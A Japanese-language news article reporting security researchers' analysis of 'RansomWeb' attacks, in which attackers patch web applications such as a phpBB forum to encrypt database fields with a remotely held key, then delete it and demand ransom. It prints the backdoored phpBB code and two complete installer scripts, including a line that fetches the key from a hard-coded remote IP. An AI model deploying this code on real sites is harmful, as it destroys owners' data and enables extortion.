「RansomWeb」ウェブサイトデータベースを暗号化する新たな攻撃ベクター

ハイテクブリッジの研究者たちは、サイバー犯罪者がウェブサイトのデータベースを暗号化し、「RansomWeb」で身代金を要求しているという研究を発表しました

ますます多くの人々がランサムウェアの犠牲になっています。これはデータを暗号化し、それを復号化するためにお金を要求するマルウェアです。市場の新たなトレンドは、サイバー犯罪者がウェブサイトをターゲットにして、あなたから身代金を得ようとしていることを示しています。

2014年12月、ハイテクブリッジのセキュリティ専門家は、金融会社のウェブサイトが侵害された非常に興味深いケースを発見しました：ウェブサイトはデータベースエラーを表示してサービスを停止しており、ウェブサイトの所有者は「データベースを復号化するための身代金」を要求するメールを受け取りました。問題のウェブアプリケーションは非常にシンプルで小さかったですが、会社のビジネスにとって非常に重要でした - 会社はそれを停止することも、侵害を発表することもできませんでした。ハイテクブリッジによる慎重な調査は以下のことを明らかにしました：

• ウェブアプリケーションは6ヶ月前に侵害され、いくつかのサーバースクリプトがデータをデータベースに挿入する前に暗号化し、データベースからデータを取得した後に復号化するように変更されました。ウェブアプリケーションのユーザーには見えない「オンザフライ」パッチです。

• データベーステーブルの最も重要なフィールドのみが暗号化されていました（おそらくウェブアプリケーションのパフォーマンスに大きな影響を与えないように）。以前に存在していたすべてのデータベースレコードもそれに応じて暗号化されました。

• 暗号化キーは、HTTPS経由でのみアクセス可能なリモートウェブサーバーに保存されていました（おそらく、さまざまなトラフィック監視システムによるキーの傍受を避けるため）。

• 6ヶ月間、ハッカーは静かに待機し、バックアップはデータベースの最近のバージョンによって上書きされていました。

• X日目に、ハッカーはリモートサーバーからキーを削除しました。データベースは使用できなくなり、ウェブサイトはサービスを停止し、ハッカーは暗号化キーのための身代金を要求しました。

研究者たちは、これは特定の会社をターゲットにした洗練されたAPTの個別の例であると確信していましたが、先週、彼らは別の類似のケースに直面しました。彼らの顧客の一人である中小企業は、彼の… phpBBフォーラムが故障した後に脅迫されました。このフォーラムは顧客サポートの主要なプラットフォームとして使用されていたため、顧客にとって重要でした。

それは2014年11月25日にリリースされた最新のphpBB 3.1.2でした。誰もログインできませんでした（フォーラムのモデレーターや管理者を含む）。フォーラムはオンラインでしたが、フォーラムユーザーが認証されることを必要とするすべての機能は動作しませんでした。私たちの徹底的な調査は、フォーラムエンジンが、ユーザーのパスワードとメールがウェブアプリケーションとデータベースの間で「オンザフライ」で暗号化されるようにパッチが適用されていることを明らかにしました。

次のファイルが変更されました：

1. ファイル「factory.php」は、その「sql_fetchrow()」関数が変更され、SQLクエリ「$result = $this->get_driver()->sql_fetchrow($query_id);」の結果が配列「result」に「user_password」と「user_email」テーブルフィールドの復号化された値を持つようにしました：
   if(isset($result[‘user_password’])){
   $result[‘user_password’] = $cipher->decrypt($result[‘user_password’]);
   }
   if(isset($result[‘user_email’])){
   $result[‘user_email’] = $cipher->decrypt($result[‘user_email’]);
   }
2. ファイル「functions_user.php」は、暗号化を追加するために「user_add」関数の変更されたバージョンを持っています：
   $sql_ary = array(
   ‘username’=>$user_row[‘username’],
   ‘username_clean’ => $username_clean,
   ‘user_password’ => (isset($user_row[‘user_password’]))?
   $cipher->encrypt($user_row[‘user_password’]):$cipher->encrypt(”),
   ‘user_email’=> $cipher->encrypt(strtolower($user_row[‘user_email’])),
   ‘user_email_hash’=> phpbb_email_hash($user_row[‘user_email’]),
   ‘group_id’ => $user_row[‘group_id’],
   ‘user_type’ => $user_row[‘user_type’],
   );
3. ファイル「cp_activate.php」は関数「main()」の変更されたバージョンを持っています：
   $sql_ary = array(
   ‘user_actkey’ => ”,
   ‘user_password’ => $cipher->encrypt($user_row[‘user_newpasswd’]),
   ‘user_newpasswd’ => ”,
   ‘user_login_attempts’ => 0,
   );
4. ファイル「ucp_profile.php」は関数「main()」の変更されたバージョンを持っています：
   if (sizeof($sql_ary))
   {
   $sql_ary[‘user_email’] = $cipher->encrypt($sql_ary[‘user_email’]);
   $sql_ary[‘user_password’] = $cipher->encrypt($sql_ary[‘user_password’]);
   $sql = ‘UPDATE ‘ . USERS_TABLE . ‘
   SET ‘ . $db->sql_build_array(‘UPDATE’, $sql_ary) . ‘
   WHERE user_id = ‘ . $user->data[‘user_id’];
   $db->sql_query($sql);
   }
5. ファイル「config.php」には次の変更がありました：
   class Cipher {
   private $securekey, $iv;
   function __construct($textkey) {
   $this->securekey = hash(‘sha256’,$textkey,TRUE);
   $this->iv = mcrypt_create_iv(32);
   }
   function encrypt($input) {
   return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
   $this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
   }
   function decrypt($input) {
   return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
   $this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
   }
   }
   $key=file_get_contents(‘https://103.13.120.108/sfdoif89d7sf8d979dfgf/
   sdfds90f8d9s0f8d0f89.txt’);
   $cipher=new Cipher($key);

さらに、研究者たちは、ハッカーによってサーバーに残された2つのバックドアインストールスクリプトを発見しました。これにより、わずか数回のクリックで任意のphpBBフォーラムにバックドアを仕掛けることができます。最初のインストーラーは、「config.php」ファイルをパッチして、データを復号化および暗号化する「Cipher」クラスを追加し、暗号化キーをリモートサーバーに保存します：

$file = ‘../config.php’;
$txt = “ ”.’class Cipher {
private $securekey, $iv;
function construct($textkey) {
$this->securekey = hash(\’sha256\’,$textkey,TRUE);
$this->iv = mcrypt_create_iv(32);
}
function encrypt($input) {
return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
}
function decrypt($input) {
return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
}
}
$key=file_get_contents(\’https://103.13.120.108/sfdoif89d7sf8d979dfgf/
sdfds90f8d9s0f8d0f89.txt\’);
$cipher=new Cipher($key);’.” ”;
if( FALSE !== file_put_contents($file, $txt, FILE_APPEND | LOCK_EX)){
echo “DONE!”;
};
そして、2番目のインストーラーは、すべての既存のphpBBユーザーを解析して、彼らのメールとパスワードを暗号化し、上記のphpBBファイルをバックドア付きのコピーに置き換えます：
define(‘IN_PHPBB’, true);
$phpbb_root_path = (defined(‘PHPBB_ROOT_PATH’)) ? PHPBB_ROOT_PATH : ‘../’;
$phpEx = substr(strrchr(FILE__, ‘.’), 1);
include($phpbb_root_path . ‘common.’ . $phpEx);
include($phpbb_root_path . ‘includes/functions_display.’ . $phpEx);
$sql = ‘SELECT user_id, user_password, user_email FROM ‘ . USERS_TABLE;
$result = $db->sql_query($sql);
while ($row = $db->sql_fetchrow($result))
{
$sql2 = ‘UPDATE ‘ . USERS_TABLE . ‘
SET
user_password = “‘.$cipher->encrypt($row[‘user_password’]).’”,
user_email = “‘.$cipher->encrypt($row[‘user_email’]).’”
WHERE user_id = ‘.$row[‘user_id’];
$result2 = $db->sql_query($sql2);
}
echo “SQL UPDATED!
”;
copy(‘factory.php’, ‘../phpbb/db/driver/factory.php’);
copy(‘functions_user.php’, ‘../includes/functions_user.php’);
copy(‘ucp_activate.php’, ‘../includes/ucp/ucp_activate.php’);
copy(‘ucp_profile.php’, ‘../includes/ucp/ucp_profile.php’);
echo “FILES UPDATED!”;

攻撃者は2ヶ月間待機し、その後リモートサーバーからキーを削除しました。ハイテクブリッジの研究者たちは後に、phpBBが盗まれたFTPパスワードを介して侵害されたことを発見しました。
現時点では、どのアンチウイルスソフトウェアもインストーラーを既知のマルウェアとして検出していません：
“step1.php”ファイル
“step2.php”ファイル

ランサムウェア攻撃の波を受けて、研究者たちはこのハッキング技術を「RansomWeb」と名付けました。

• RansomWeb攻撃の簡単な分析を試みましょう：

• RansomWebの潜在的な機会：

• DDoS攻撃とは異なり、ウェブアプリケーションの可用性に永続的な影響を与える可能性があります。

• 脅迫だけでなく、長期的なウェブサイトの破壊にも使用される可能性があります。

• バックアップはあまり役に立たない可能性があります。なぜなら、データベースは暗号化モードでバックアップされ、暗号化キーはリモートに保存され、バックアップされないからです。

• 身代金を支払わずに攻撃から回復することはほぼ不可能であり、多くの犠牲者はハッカーに支払うしか選択肢がありません。

• ホスティング会社はこの新たな課題に対処する準備ができておらず、おそらく顧客を助けることができないでしょう。

研究者たちはまた、「RansomWeb」の潜在的な弱点を以下のように特定しました：

• ファイル整合性モニターによって簡単に検出できます（ただし、非常に少数の企業が毎日変更される可能性のあるウェブアプリケーションのファイル整合性モニタリングを行っています）。

• ウェブアプリケーションの機能や速度を損なうことなく、データベース全体を暗号化することは非常に難しい（それでも、回復不可能なDBフィールドが1つでもあると、ウェブアプリケーションが破損する可能性があります）。

• 定期的に更新されるウェブアプリケーションで使用されると、比較的早く検出される可能性があります。

リソース：ハイテクブリッジ